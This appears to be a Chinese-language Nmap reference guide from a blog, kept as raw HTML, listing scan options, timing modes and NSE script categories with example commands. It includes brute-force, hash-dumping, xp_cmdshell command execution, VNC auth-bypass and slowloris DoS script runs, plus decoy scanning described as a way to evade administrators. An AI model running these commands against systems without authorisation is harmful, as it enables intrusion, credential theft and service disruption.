class=\"wp-block-paragraph\">\u4e0b\u9762\u7ed9\u51fa\u4e00\u4e9b\u5b9e\u4f8b\uff0c\u7b80\u5355\u7684\u3001\u590d\u6742\u7684\u5230\u6df1\u5965\u7684\u3002\u4e3a\u66f4\u5177\u4f53\uff0c\u4e00 \u4e9b\u4f8b\u5b50\u4f7f\u7528\u4e86\u5b9e\u9645\u7684IP\u5730\u5740\u548c\u57df\u540d\u3002\u5728\u8fd9\u4e9b\u4f4d\u7f6e\uff0c\u53ef\u4ee5\u4f7f\u7528<em>\u4f60\u81ea\u5df1\u7f51\u7edc<\/em>&nbsp;\u7684\u5730\u5740\/\u57df\u540d\u66ff\u6362\u3002\u6ce8\u610f\uff0c\u626b\u63cf\u5176\u5b83\u7f51\u7edc\u4e0d\u4e00\u5b9a\u5408\u6cd5\uff0c\u4e00\u4e9b\u7f51\u7edc\u7ba1\u7406\u5458\u4e0d\u613f\u770b\u5230 \u672a\u7533\u8bf7\u8fc7\u7684\u626b\u63cf\uff0c\u4f1a\u4ea7\u751f\u62a5\u6028\u3002\u56e0\u6b64\uff0c\u5148\u83b7\u5f97\u5141\u8bb8\u662f\u6700\u597d\u7684\u529e\u6cd5\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u5982\u679c\u662f\u4e3a\u4e86\u6d4b\u8bd5\uff0c<code>scanme.nmap.org<\/code>&nbsp;\u5141\u8bb8\u88ab\u626b\u63cf\u3002\u4f46\u4ec5\u5141\u8bb8\u4f7f\u7528Nmap\u626b\u63cf\u5e76\u7981\u6b62\u6d4b\u8bd5\u6f0f\u6d1e\u6216\u8fdb\u884cDoS\u653b\u51fb\u3002\u4e3a \u4fdd\u8bc1\u5e26\u5bbd\uff0c\u5bf9\u8be5\u4e3b\u673a\u7684\u626b\u63cf\u6bcf\u5929\u4e0d\u8981\u8d85\u8fc712\u6b21\u3002\u5982\u679c\u8fd9\u4e2a\u514d\u8d39\u626b\u63cf\u670d\u52a1\u88ab \u6ee5\u7528\uff0c\u7cfb\u7edf\u5c06\u5d29\u6e83\u800c\u4e14Nmap\u5c06\u62a5\u544a<code>\u89e3\u6790 \u6307\u5b9a\u7684\u4e3b\u673a\u540d\/IP\u5730\u5740\u5931\u8d25\uff1ascanme.nmap.org<\/code>\u3002\u8fd9\u4e9b\u514d \u8d39\u626b\u63cf\u8981\u6c42\u4e5f\u9002\u7528\u4e8e<code>scanme2.nmap.org<\/code>\u3001&nbsp;<code>scanme3.nmap.org<\/code>\u7b49\u7b49\uff0c\u867d\u7136\u8fd9\u4e9b \u4e3b\u673a\u76ee\u524d\u8fd8\u4e0d\u5b58\u5728\u3002<\/p>\n\n\n<pre class=\"wp-block-code\"><code>nmap -v scanme.nmap.org \/\/\u8fd9\u4e2a\u9009\u9879\u626b\u63cf\u4e3b\u673ascanme.nmap.org\u4e2d \u6240\u6709\u7684\u4fdd\u7559TCP\u7aef\u53e3\u3002\u9009\u9879-v\u542f\u7528\u7ec6\u8282\u6a21\u5f0f\u3002\nnmap -sS -O scanme.nmap.org\/24 \/\/\u8fdb\u884c\u79d8\u5bc6SYN\u626b\u63cf\uff0c\u5bf9\u8c61\u4e3a\u4e3b\u673aSaznme\u6240\u5728\u7684\u201cC\u7c7b\u201d\u7f51\u6bb5 \u7684255\u53f0\u4e3b\u673a\u3002\u540c\u65f6\u5c1d\u8bd5\u786e\u5b9a\u6bcf\u53f0\u5de5\u4f5c\u4e3b\u673a\u7684\u64cd\u4f5c\u7cfb\u7edf\u7c7b\u578b\u3002\u56e0\u4e3a\u8fdb\u884cSYN\u626b\u63cf \u548c\u64cd\u4f5c\u7cfb\u7edf\u68c0\u6d4b\uff0c\u8fd9\u4e2a\u626b\u63cf\u9700\u8981\u6709\u6839\u6743\u9650\u3002\nnmap -sV -p 22\uff0c53\uff0c110\uff0c143\uff0c4564 198.116.0-255.1-127 \/\/\u8fdb\u884c\u4e3b\u673a\u5217\u4e3e\u548cTCP\u626b\u63cf\uff0c\u5bf9\u8c61\u4e3aB\u7c7b188.116\u7f51\u6bb5\u4e2d255\u4e2a8\u4f4d\u5b50\u7f51\u3002\u8fd9 \u4e2a\u6d4b\u8bd5\u7528\u4e8e\u786e\u5b9a\u7cfb\u7edf\u662f\u5426\u8fd0\u884c\u4e86sshd\u3001DNS\u3001imapd\u62164564\u7aef\u53e3\u3002\u5982\u679c\u8fd9\u4e9b\u7aef\u53e3 \u6253\u5f00\uff0c\u5c06\u4f7f\u7528\u7248\u672c\u68c0\u6d4b\u6765\u786e\u5b9a\u54ea\u79cd\u5e94\u7528\u5728\u8fd0\u884c\u3002\nnmap -v -iR 100000 -P0 -p 80 \/\/\u968f\u673a\u9009\u62e9100000\u53f0\u4e3b\u673a\u626b\u63cf\u662f\u5426\u8fd0\u884cWeb\u670d\u52a1\u5668(80\u7aef\u53e3)\u3002\u7531\u8d77\u59cb\u9636\u6bb5 \u53d1\u9001\u63a2\u6d4b\u62a5\u6587\u6765\u786e\u5b9a\u4e3b\u673a\u662f\u5426\u5de5\u4f5c\u975e\u5e38\u6d6a\u8d39\u65f6\u95f4\uff0c\u800c\u4e14\u53ea\u9700\u63a2\u6d4b\u4e3b\u673a\u7684\u4e00\u4e2a\u7aef\u53e3\uff0c\u56e0 \u6b64\u4f7f\u7528-P0\u7981\u6b62\u5bf9\u4e3b\u673a\u5217\u8868\u3002\nnmap -P0 -p80 -oX logs\/pb-port80scan.xml -oG logs\/pb-port80scan.gnmap 216.163.128.20\/20 \/\/\u626b\u63cf4096\u4e2aIP\u5730\u5740\uff0c\u67e5\u627eWeb\u670d\u52a1\u5668(\u4e0dping)\uff0c\u5c06\u7ed3\u679c\u4ee5Grep\u548cXML\u683c\u5f0f\u4fdd\u5b58\u3002\nhost -l company.com | cut -d -f 4 | nmap -v -iL - \/\/\u8fdb\u884cDNS\u533a\u57df\u4f20\u8f93\uff0c\u4ee5\u53d1\u73b0company.com\u4e2d\u7684\u4e3b\u673a\uff0c\u7136\u540e\u5c06IP\u5730\u5740\u63d0\u4f9b\u7ed9 Nmap\u3002\u4e0a\u8ff0\u547d\u4ee4\u7528\u4e8eGNU\/Linux -- \u5176\u5b83\u7cfb\u7edf\u8fdb\u884c\u533a\u57df\u4f20\u8f93\u65f6\u6709\u4e0d\u540c\u7684\u547d\u4ee4<\/code><\/pre>\n\n\n<pre class=\"wp-block-code\"><code>\u626b\u63cf\u7f51\u6bb5 (192.168.1.0\/24)\n nmap -sP 192.168.1.0\/24 \u6216\u8005 nmap -sP 192.168.1.*\nSYN\u5bf9\u5168\u7aef\u53e3\u8fdb\u884c\u626b\u63cf\n \u5728aggressive(4)\u7684\u65f6\u95f4\u6a21\u677f\u4e0b,\u540c\u65f6\u5bf9\u5f00\u653e\u7684\u7aef\u53e3\u8fdb\u884c\u7aef\u53e3\u8bc6\u522b\uff0c\u5e76\u67e5\u770b\u76f8\u5e94\u7684\u670d\u52a1\u5668\u7248\u672c\u3002\n nmap -sS -T4 -p1-65535 -sV 192.168.1.169\n \u5728aggressive(4)\u7684\u65f6\u95f4\u6a21\u677f\u4e0b\uff0c\u63a2\u6d4b\u64cd\u4f5c\u7cfb\u7edf\u7684\u7c7b\u578b\u548c\u7248\u672c\uff0c\u5e76\u663e\u793atraceroute\u7684\u7ed3\u679c\u3002\n nmap -sS -T4 -A 192.168.1.169\n nmap -sS -T4 -A -O 192.168.1.169\n\u6587\u4ef6\u4e2d\u8bfb\u53d6\u9700\u8981\u626b\u63cf\u7684IP\u5217\u8868\n nmap -iL ips.txt\n\u626b\u63cf\u7684\u7ed3\u679c\u8f93\u51fa\u5904\u7406\n \u5c06\u626b\u63cf\u7684\u7ed3\u679c\u8f93\u51fa\u5230\u5c4f\u5e55\uff0c\u540c\u65f6\u5b58\u50a8\u4e00\u4efd\u5230output.txt\u3002\n nmap -sS -p1-65525 192.168.1.169 -oG output.txt\n\u626b\u63cf\u7ed3\u679c\u8f93\u51fa\u4e3ahtml\u3002\n nmap -sS -p1-65525 192.168.1.169 --webxml -oX - | xsltproc --output file.html\n\u5728\u5b50\u7f51\u4e2d\u53d1\u73b0\u5f00\u653enetbios\u7684IP \n nmap -sV -v -p139,445 192.168.1.0\/24\n\u626b\u63cf\u6307\u5b9anetbios\u7684\u540d\u79f0 \n nmap -sU --script nbstat.nse -p 137 target\n\u626b\u63cf\u6307\u5b9a\u7684\u76ee\u6807,\u540c\u65f6\u68c0\u6d4b\u76f8\u5173\u6f0f\u6d1e \n nmap --script-args=unsafe=1 --script smb-check-vulns.nse -p 445 169\n\nnmap\u811a\u672c\u4f7f\u7528 \n auth: \u8d1f\u8d23\u5904\u7406\u9274\u6743\u8bc1\u4e66\uff08\u7ed5\u5f00\u9274\u6743\uff09\u7684\u811a\u672c \n broadcast: \u5728\u5c40\u57df\u7f51\u5185\u63a2\u67e5\u66f4\u591a\u670d\u52a1\u5f00\u542f\u72b6\u51b5\uff0c\u5982dhcp\/dns\/sqlserver\u7b49\u670d\u52a1 \n brute: \u63d0\u4f9b\u66b4\u529b\u7834\u89e3\u65b9\u5f0f\uff0c\u9488\u5bf9\u5e38\u89c1\u7684\u5e94\u7528\u5982http\/snmp\u7b49 \n default: \u4f7f\u7528-sC\u6216-A\u9009\u9879\u626b\u63cf\u65f6\u5019\u9ed8\u8ba4\u7684\u811a\u672c\uff0c\u63d0\u4f9b\u57fa\u672c\u811a\u672c\u626b\u63cf\u80fd\u529b \n discovery: \u5bf9\u7f51\u7edc\u8fdb\u884c\u66f4\u591a\u7684\u4fe1\u606f\uff0c\u5982SMB\u679a\u4e3e\u3001SNMP\u67e5\u8be2\u7b49 \n dos: \u7528\u4e8e\u8fdb\u884c\u62d2\u7edd\u670d\u52a1\u653b\u51fb \n exploit: \u5229\u7528\u5df2\u77e5\u7684\u6f0f\u6d1e\u5165\u4fb5\u7cfb\u7edf \n external: \u5229\u7528\u7b2c\u4e09\u65b9\u7684\u6570\u636e\u5e93\u6216\u8d44\u6e90\uff0c\u4f8b\u5982\u8fdb\u884cwhois\u89e3\u6790 \n fuzzer: \u6a21\u7cca\u6d4b\u8bd5\u7684\u811a\u672c\uff0c\u53d1\u9001\u5f02\u5e38\u7684\u5305\u5230\u76ee\u6807\u673a\uff0c\u63a2\u6d4b\u51fa\u6f5c\u5728\u6f0f\u6d1e \n intrusive: \u5165\u4fb5\u6027\u7684\u811a\u672c\uff0c\u6b64\u7c7b\u811a\u672c\u53ef\u80fd\u5f15\u53d1\u5bf9\u65b9\u7684IDS\/IPS\u7684\u8bb0\u5f55\u6216\u5c4f\u853d \n malware: \u63a2\u6d4b\u76ee\u6807\u673a\u662f\u5426\u611f\u67d3\u4e86\u75c5\u6bd2\u3001\u5f00\u542f\u4e86\u540e\u95e8\u7b49\u4fe1\u606f \n safe: \u6b64\u7c7b\u4e0eintrusive\u76f8\u53cd\uff0c\u5c5e\u4e8e\u5b89\u5168\u6027\u811a\u672c \n version: \u8d1f\u8d23\u589e\u5f3a\u670d\u52a1\u4e0e\u7248\u672c\u626b\u63cf\uff08Version Detection\uff09\u529f\u80fd\u7684\u811a\u672c \n vuln: \u8d1f\u8d23\u68c0\u67e5\u76ee\u6807\u673a\u662f\u5426\u6709\u5e38\u89c1\u7684\u6f0f\u6d1e\uff08Vulnerability\uff09\uff0c\u5982\u662f\u5426\u6709MS08_067\n\n\u8d1f\u8d23\u5904\u7406\u9274\u6743\u8bc1\u4e66\uff08\u7ed5\u5f00\u9274\u6743\uff09\u7684\u811a\u672c,\u4e5f\u53ef\u4ee5\u4f5c\u4e3a\u68c0\u6d4b\u90e8\u5206\u5e94\u7528\u5f31\u53e3\u4ee4 \n nmap --script=auth 192.168.1.*\n\u63d0\u4f9b\u66b4\u529b\u7834\u89e3\u7684\u65b9\u5f0f \u53ef\u5bf9\u6570\u636e\u5e93\uff0csmb\uff0csnmp\u7b49\u8fdb\u884c\u7b80\u5355\u5bc6\u7801\u7684\u66b4\u529b\u731c\u89e3 \n nmap --script=brute 192.168.1.169\n\u9ed8\u8ba4\u7684\u811a\u672c\u626b\u63cf\uff0c\u4e3b\u8981\u662f\u641c\u96c6\u5404\u79cd\u5e94\u7528\u670d\u52a1\u7684\u4fe1\u606f\uff0c\u6536\u96c6\u5230\u540e\uff0c\u53ef\u518d\u9488\u5bf9\u5177\u4f53\u670d\u52a1\u8fdb\u884c\u653b\u51fb \n nmap --script=default 192.168.1.169 \u6216\u8005 nmap -sC 192.168.1.169\n\u68c0\u67e5\u662f\u5426\u5b58\u5728\u5e38\u89c1\u6f0f\u6d1e \n nmap --script=vuln 192.168.1.169\n\u5728\u5c40\u57df\u7f51\u5185\u63a2\u67e5\u66f4\u591a\u670d\u52a1\u5f00\u542f\u72b6\u51b5 \n nmap -n -p445 --script=broadcast 192.168.1.169\n\u5229\u7528\u7b2c\u4e09\u65b9\u7684\u6570\u636e\u5e93\u6216\u8d44\u6e90\uff0c\u4f8b\u5982\u8fdb\u884cwhois\u89e3\u6790 \n nmap --script external 192.168.1.169\nvnc\u626b\u63cf \n nmap --script=realvnc-auth-bypass 192.168.1.169\n\u83b7\u53d6vnc\u4fe1\u606f \n nmap --script=vnc-info 192.168.1.169\nsmb\u626b\u63cf \n \u8bf4\u660e:SMB\u534f\u8bae\u662f\u57fa\u4e8eTCP\uff0dNETBIOS\u4e0b\u7684\uff0c\u4e00\u822c\u7aef\u53e3\u4f7f\u7528\u4e3a139\uff0c445\u3002\n nmap --script=smb-brute.nse 192.168.1.169\nsmb\u5b57\u5178\u7834\u89e3 \n nmap --script=smb-brute.nse --script-args=userdb=\/var\/passwd,passdb=\/var\/passwd 192.168.1.169\nsmb\u5df2\u77e5\u51e0\u4e2a\u4e25\u91cd\u6f0f\u626b\u63cf \n nmap --script=smb-check-vulns.nse --script-args=unsafe=1 192.168.1.169\nsmb\u67e5\u770b\u5171\u4eab\u76ee\u5f55 \n nmap -p 445 --script smb-ls --script-args 'share=c$,path=test,smbuser=administrator,smbpass=fuckyou' 192.168.1.169\nsmb\u67e5\u8be2\u4e3b\u673a\u4e00\u4e9b\u654f\u611f\u4fe1\u606f \n nmap -p 445 -n \u2013script=smb-psexec --script-args 'smbuser=administrator,smbpass=fuckyou' 192.168.1.169\nsmb\u67e5\u770b\u4f1a\u8bdd \n nmap -p 445 -n --script=smb-enum-sessions --script-args 'smbuser=administrator,smbpass=fuckyou' 192.168.1.169\nsmb\u7cfb\u7edf\u4fe1\u606f \n nmap -p 445 -n --script=smb-os-discovery --script-args 'smbuser=administrator,smbpass=fuckyou' 192.168.1.169\n\u731c\u89e3mssql\u7528\u6237\u540d\u548c\u5bc6\u7801\n nmap -p1433 --script=ms-sql-brute --script-args=userdb=\/var\/passwd,passdb=\/var\/passwd 192.168.1.169\nxp_cmdshell \u6267\u884c\u547d\u4ee4\n nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd=\"net user\" 192.168.1.169\ndumphash\u503c\n nmap -p 1433 --script ms-sql-dump-hashes --script-args mssql.username=sa,mssql.password=sa 192.168.1.169\n\u626b\u63cfroot\u7a7a\u53e3\u4ee4\n nmap -p3306 --script=mysql-empty-password 192.168.1.169 \n\u5217\u51fa\u6240\u6709mysql\u7528\u6237\n nmap -p3306 --script=mysql-users --script-args=mysqluser=root 192.168.1.169 \n\u652f\u6301\u540c\u4e00\u5e94\u7528\u7684\u6240\u6709\u811a\u672c\u626b\u63cf\n nmap --script=mysql-* 192.168.1.169 \noracle sid\u626b\u63cf\n nmap --script=oracle-sid-brute -p 1521-1560 192.168.1.5\noracle\u5f31\u53e3\u4ee4\u7834\u89e3\n nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=ORCL,userdb=\/var\/passwd,passdb=\/var\/passwd 192.168.1.5\n\u5176\u4ed6\u4e00\u4e9b\u6bd4\u8f83\u597d\u7528\u7684\u811a\u672c\n nmap --script=broadcast-netbios-master-browser 192.168.137.4 \n \u53d1\u73b0\u7f51\u5173 nmap -p 873 --script rsync-brute --script-args 'rsync-brute.module=www' 192.168.137.4 \n \u7834\u89e3rsync nmap --script informix-brute -p 9088 192.168.137.4 informix\n \u6570\u636e\u5e93\u7834\u89e3 nmap -p 5432 --script pgsql-brute 192.168.137.4 \n pgsql\u7834\u89e3 nmap -sU --script snmp-brute 192.168.137.4 \n snmp\u7834\u89e3 nmap -sV --script=telnet-brute 192.168.137.4 \n telnet\u7834\u89e3 nmap --script=http-vuln-cve2010-0738 --script-args 'http-vuln-cve2010-0738.paths={\/path1\/,\/path2\/}' \n jboss autopwn nmap --script=http-methods.nse 192.168.137.4 \n \u68c0\u67e5http\u65b9\u6cd5 nmap --script http-slowloris --max-parallelism 400 192.168.137.4 \n\n dos\u653b\u51fb\uff0c\u5bf9\u4e8e\u5904\u7406\u80fd\u529b\u8f83\u5c0f\u7684\u7ad9\u70b9\u8fd8\u633a\u597d\u7528\u7684 'half-HTTP' connections \n nmap --script=samba-vuln-cve-2012-1182 -p 139 192.168.137.4 <\/code><\/pre>\n\n\n<pre class=\"wp-block-code\"><code>-sP \u6e17\u900f\u5185\u7f51\u4e4b\u540e\u5224\u65ad\u5f53\u524d\u7f51\u7edc\u90a3\u4e9b\u4e3b\u673a\u5728\u7ebf \n nmap -sP 192.168.1\/255 \n\n-vv \u73b0\u5b9e\u8be6\u7ec6\u7684\u626b\u63cf\u8fc7\u7a0b \n-sS \u4f7f\u7528SYN\u534a\u5f00\u5f0f\u626b\u63cf\uff0c\u8fd9\u79cd\u626b\u63cf\u65b9\u5f0f\u4f7f\u5f97\u626b\u63cf\u7ed3\u679c\u66f4\u52a0\u6b63\u786e(\u53c8\u79f0\u534a\u5f00\u653e,\u6216 \u9690\u8eab\u626b\u63cf) \n nmap -vv -sS IP \n\n-O \u5927\u5199O\u4ee3\u8868OS \u5224\u65ad\u4e3b\u673a\u64cd\u4f5c\u7cfb\u7edf \n nmap -O IP \n\n\u5ef6\u65f6\u7b56\u7565 \n-T(0-5) \u9ed8\u8ba4\u4e3a3 \n 0 \u5373Paranoid\u6a21\u5f0f\u3002\u4e3a\u4e86\u907f\u5f00IDS\u7684\u68c0\u6d4b\u4f7f\u626b\u63cf\u901f\u5ea6\u6781\u6162\uff0cnmap\u4e32\u6240\u6709\u7684\u626b\u63cf\uff0c\u6bcf\u9694\u81f3\u5c115\u5206\u949f\u53d1\u9001\u4e00\u4e2a\u5305 \n 1 \u5373Sneaky\u6a21\u5f0f\u3002\u4e5f\u5dee\u4e0d\u591a\uff0c\u53ea\u662f\u6570\u636e\u5305\u7684\u53d1\u9001\u95f4\u9694\u662f15\u79d2 \n 2 \u5373Polite\u6a21\u5f0f\u3002\u4e0d\u589e\u52a0\u592a\u5927\u7684\u7f51\u7edc\u8d1f\u8f7d\uff0c\u4e32\u884c\u6bcf\u4e2a\u63a2\u6d4b\uff0c\u5e76\u4f7f\u6bcf\u4e2a\u63a2\u6d4b\u95f4\u9694 0.4\u79d2 \n 3 \u5373Normal\u6a21\u5f0f\u3002nmap\u7684\u9ed8\u8ba4\u9009\u9879\uff0c\u5728\u4e0d\u4f7f\u7f51\u7edc\u8fc7\u8f7d\u6216\u8005\u4e3b\u673a\/\u7aef\u53e3\u4e22\u5931\u7684\u60c5\u51b5\u4e0b\u5c3d\u53ef\u80fd\u5feb\u901f\u5730\u626b\u63cf \n 4 \u5373Aggressive\u6a21\u5f0f\u3002\u8bbe\u7f6e5\u5206\u949f\u7684\u8d85\u65f6\u9650\u5236\uff0c\u5bf9\u6bcf\u53f0\u4e3b\u673a\u7684\u626b\u63cf\u65f6\u95f4\u4e0d\u8d85\u8fc75\u5206\u949f\uff0c\u5e76\u4e14\u5bf9\u6bcf\u6b21\u63a2\u6d4b\u56de\u5e94\u7684\u7b49\u5f85\u65f6\u95f4\u4e0d\u8d85\u8fc71.5\u79d2\u3002 \n 5 \u5373lnsane\u6a21\u5f0f\u3002\u53ea\u9002\u5408\u5feb\u901f\u7684\u7f51\u7edc\u6216\u8005\u4e0d\u5728\u610f\u4e22\u5931\u9ed8\u4e9b\u4fe1\u606f\uff0c\u6bcf\u53f0\u4e3b\u673a\u7684\u8d85\u65f6 \u9650\u5236\u4e3a75\u79d2\uff0c\u5bf9\u6bcf\u6b21\u63a2\u6d4b\u53ea\u7b49\u5f850.3\u79d2\u3002 \n\n nmap -sS -T1 IP \n\n-sV \u63a2\u6d4b\u7aef\u53e3\u7684\u670d\u52a1\u7c7b\u578b\/\u5177\u4f53\u7248\u672c\u7b49\u4fe1\u606f \n nmap -vv -sV IP \n-p \u7aef\u53e3\u53f7 \u5bf9\u67d0\u4e2a\u7aef\u53e3\u7684\u670d\u52a1\u7248\u672c\u8fdb\u884c\u8be6\u7ec6\u63a2\u6d4b \u6709\u52a9\u4e8e\u5347\u5165\u7684\u9488\u5bf9\u6027\u653b\u51fb\uff0c \u6bd4\u5982\u7f13\u51b2\u6ea2\u51fa\u653b\u51fb \n nmap -vv -sV IP -p 21 \n\n\u9002\u7528\u4e8e\u5185\u5916\u7f51\u7684\u63a2\u6d4b\uff0c\u4ee5\u5185\u7f51\u64cd\u4f5c\u4e3a\u793a\u4f8b(\u5916\u7f51\u53c2\u6570\u540c) \n\u3000\u3000 \n\u7b80\u5355\u7aef\u53e3\u626b\u63cf\uff1a \n nmap -vv -sT(sS\u3001sF\u3001sU\u3001sA) 192.168.0.1 -D 127.0.0.1 \n (-D\u4f2a\u9020\u7684\u5730\u5740) \n\u3000\u3000 \nOS\u68c0\u6d4b\uff1a \n nmap -vv -sS -O 192.168.0.1 \n\u3000\u3000 \nRPC\u9274\u522b\uff1a \n nmap -sS -sR 192.168.0.1 \n Linux\u4e0a\u7684portmap\u5c31\u662f\u4e00\u4e2a\u7b80\u5355\u7684RPC\u670d\u52a1\uff0c\u76d1\u542c\u7aef\u53e3\u4e3a111(\u9ed8\u8ba4) \nPing\u626b\u5c04\uff1a\n nmap -sP 172.16.15.0\/24 \n\n\u5341\u6761\u5e38\u7528nmap\u547d\u4ee4\u884c\u683c\u5f0f \n\n1)\u83b7\u53d6\u8fdc\u7a0b\u4e3b\u673a\u7684\u7cfb\u7edf\u7c7b\u578b\u53ca\u5f00\u653e\u7aef\u53e3 \n nmap -sS -P0 -sV -O &lt;target> \n \u8fd9\u91cc\u7684 &lt; target > \u53ef\u4ee5\u662f\u5355\u4e00 IP, \u6216\u4e3b\u673a\u540d\uff0c\u6216\u57df\u540d\uff0c\u6216\u5b50\u7f51 \n -sS TCP SYN \u626b\u63cf (\u53c8\u79f0\u534a\u5f00\u653e,\u6216\u9690\u8eab\u626b\u63cf) \n -P0 \u5141\u8bb8\u4f60\u5173\u95ed ICMP pings. \n -sV \u6253\u5f00\u7cfb\u7edf\u7248\u672c\u68c0\u6d4b \n -O \u5c1d\u8bd5\u8bc6\u522b\u8fdc\u7a0b\u64cd\u4f5c\u7cfb\u7edf \n -sS TCP SYN scanning (also known as half-open, or stealth scanning) \n -P0 option allows you to switch off ICMP pings. \n -sV option enables version detection \n -O flag attempt to identify the remote operating system \n Other option: \n -A \u540c\u65f6\u542f\u7528\u64cd\u4f5c\u7cfb\u7edf\u6307\u7eb9\u8bc6\u522b\u548c\u7248\u672c\u68c0\u6d4b \n -A option enables both OS fingerprinting and version detection \n -v use -v twice for more verbosity. \n nmap -sS -P0 -A -v &lt; target > \n2)\u5217\u51fa\u5f00\u653e\u4e86\u6307\u5b9a\u7aef\u53e3\u7684\u4e3b\u673a\u5217\u8868 \n nmap -sT -p 80 -oG \u2013 192.168.1.* | grep open \n3)\u5728\u7f51\u7edc\u5bfb\u627e\u6240\u6709\u5728\u7ebf\u4e3b\u673a \n nmap -sP 192.168.0.* \n \u6216\u8005\u4e5f\u53ef\u7528\u4ee5\u4e0b\u547d\u4ee4: \n nmap -sP 192.168.0.0\/24 \n \u6307\u5b9a subnet \n4)Ping \u6307\u5b9a\u8303\u56f4\u5185\u7684 IP \u5730\u5740 \n nmap -sP 192.168.1.100-254 \n5)\u5728\u67d0\u6bb5\u5b50\u7f51\u4e0a\u67e5\u627e\u672a\u5360\u7528\u7684 IP \n nmap -T4 -sP 192.168.2.0\/24 &amp;&amp; egrep \"00:00:00:00:00:00\" \/proc\/net\/arp \n6)\u5728\u5c40\u57df\u7f51\u4e0a\u626b\u627e Conficker \u8815\u866b\u75c5\u6bd2 \n nmap -PN -T4 -p139,445 -n -v \u2013script=smb-check-vulns \u2013script-args \n safe=1 192.168.0.1-254 \n replace 192.168.0.1-256 with the IP\u2019s you want to check. \n7)\u626b\u63cf\u7f51\u7edc\u4e0a\u7684\u6076\u610f\u63a5\u5165\u70b9 rogue APs. \n nmap -A -p1-85,113,443,8080-8100 -T4 \u2013min-hostgroup 50 \u2013max-rtt- \n timeout 2000 \u2013initial-rtt-timeout 300 \u2013max-retries 3 \u2013host-timeout \n 20m \u2013max-scan-delay 1000 -oA wapscan 10.0.0.0\/8 \n I\u2019ve used this scan to successfully find many rogue APs on a very, very large network. \n8)\u4f7f\u7528\u8bf1\u9975\u626b\u63cf\u65b9\u6cd5\u6765\u626b\u63cf\u4e3b\u673a\u7aef\u53e3 \n Use a decoy while scanning ports to avoid getting caught by the sys \n admin \n sudo nmap -sS 192.168.0.10 -D 192.168.0.2 \n Scan for open ports on the target device\/computer (192.168.0.10) while \n setting up a decoy address (192.168.0.2). This will show the decoy ip \n address instead of your ip in targets security logs. Decoy address \n needs to be alive. Check the targets security log at \/var\/log\/secure \n to make sure it worked. \n9)\u4e3a\u4e00\u4e2a\u5b50\u7f51\u5217\u51fa\u53cd\u5411 DNS \u8bb0\u5f55 \n List of reverse DNS records for a subnet \n nmap -R -sL 209.85.229.99\/27 | awk '{if($3==\"not\")print\"(\"$2\") no \n PTR\";else print$3\" is \"$2}' | grep '(' \n10)\u663e\u793a\u7f51\u7edc\u4e0a\u5171\u6709\u591a\u5c11\u53f0 Linux \u53ca Win \u8bbe\u5907? \n How Many Linux And Windows Devices Are On Your Network? \n sudo nmap -F -O 192.168.1.1-255 | grep \"Running: \" > \/tmp\/os; echo \n \"$(cat \/tmp\/os | grep Linux | wc -l) Linux device(s)\"; echo \"$(cat \n \/tmp\/os | grep Windows | wc -l) Window(s) devices\"<\/code><\/pre>\n\n\n<h1 class=\"wp-block-heading\">nmap script&nbsp;Engine (NSE)<\/h1>\n\n\n<p class=\"wp-block-paragraph\"><strong>nmap script engine \u5b98\u7f51\uff1a<a target=\"_blank\" href=\"https:\/\/byy3.com\/go\/?url=https:\/\/nmap.org\/book\/man-nse.html\" rel=\"noreferrer noopener\" rel=\"nofollow\" ><a href=\"https:\/\/byy3.com\/go\/?url=https:\/\/nmap.org\/book\/man-nse.html\" rel=\"nofollow\" >https:\/\/nmap.org\/book\/man-nse.html<\/a><\/a><\/strong><\/p>\n\n\n<pre class=\"wp-block-code\"><code>Nmap\u63d0\u4f9b\u7684\u547d\u4ee4\u884c\u53c2\u6570\u5982\u4e0b\uff1a\n\n-sC: \u7b49\u4ef7\u4e8e\u2013script=default\uff0c\u4f7f\u7528\u9ed8\u8ba4\u7c7b\u522b\u7684\u811a\u672c\u8fdb\u884c\u626b\u63cf \u53ef\u66f4\u6362\u5176\u4ed6\u7c7b\u522b \n\n\u2013script=&lt;Lua scripts>: &lt;Lua scripts>\u4f7f\u7528\u67d0\u4e2a\u6216\u67d0\u7c7b\u811a\u672c\u8fdb\u884c\u626b\u63cf\uff0c\u652f\u6301\u901a\u914d\u7b26\u63cf\u8ff0\n\n\u2013script-args=&lt;n1=v1,&#91;n2=v2,...]>: \u4e3a\u811a\u672c\u63d0\u4f9b\u9ed8\u8ba4\u53c2\u6570\n\n\u2013script-args-file=filename: \u4f7f\u7528\u6587\u4ef6\u6765\u4e3a\u811a\u672c\u63d0\u4f9b\u53c2\u6570\n\n\u2013script-trace: \u663e\u793a\u811a\u672c\u6267\u884c\u8fc7\u7a0b\u4e2d\u53d1\u9001\u4e0e\u63a5\u6536\u7684\u6570\u636e\n\n\u2013script-updatedb: \u66f4\u65b0\u811a\u672c\u6570\u636e\u5e93\n\n\u2013script-help=&lt;scripts>: \u663e\u793a\u811a\u672c\u7684\u5e2e\u52a9\u4fe1\u606f\uff0c\u5176\u4e2d&lt;scripts>\u90e8\u5206\u53ef\u4ee5\u9017\u53f7\u5206\u9694\u7684\u6587\u4ef6\u6216\u811a\u672c\u7c7b\u522b<\/code><\/pre>\n\n\n<h2 class=\"wp-block-heading\">nmap \u4fe1\u606f\u641c\u96c6<\/h2>\n\n\n<p class=\"wp-block-paragraph\">\u4e3b\u8981\u4ecb\u7ecdnmap \u7684 NES \u811a\u672c\uff0c\u811a\u672c\u662f\u7528lua \u7a0b\u5e8f\u521b\u4f5c\u7684\u3002\u901a\u8fc7\u5bf9 nmap \u4fe1\u606f\u641c\u96c6\u811a\u672c\u7684\u4f7f\u7528 \u4e86\u89e3 nmap \u7684\u9ad8\u7ea7\u6280\u6cd5\u3002<\/p>\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" data-original=\"https:\/\/img-blog.csdn.net\/20170517145609210?watermark\/2\/text\/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvZnJlZWtpbmcxMDE=\/font\/5a6L5L2T\/fontsize\/400\/fill\/I0JBQkFCMA==\/dissolve\/70\/gravity\/Center\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" title=\"Nmap\u8be6\u7ec6\u53c2\u8003\u6307\u5357\u63d2\u56fe14\" alt=\"Nmap\u8be6\u7ec6\u53c2\u8003\u6307\u5357\u63d2\u56fe14\" \/><\/figure>\n\n\n<p class=\"wp-block-paragraph\">nmap 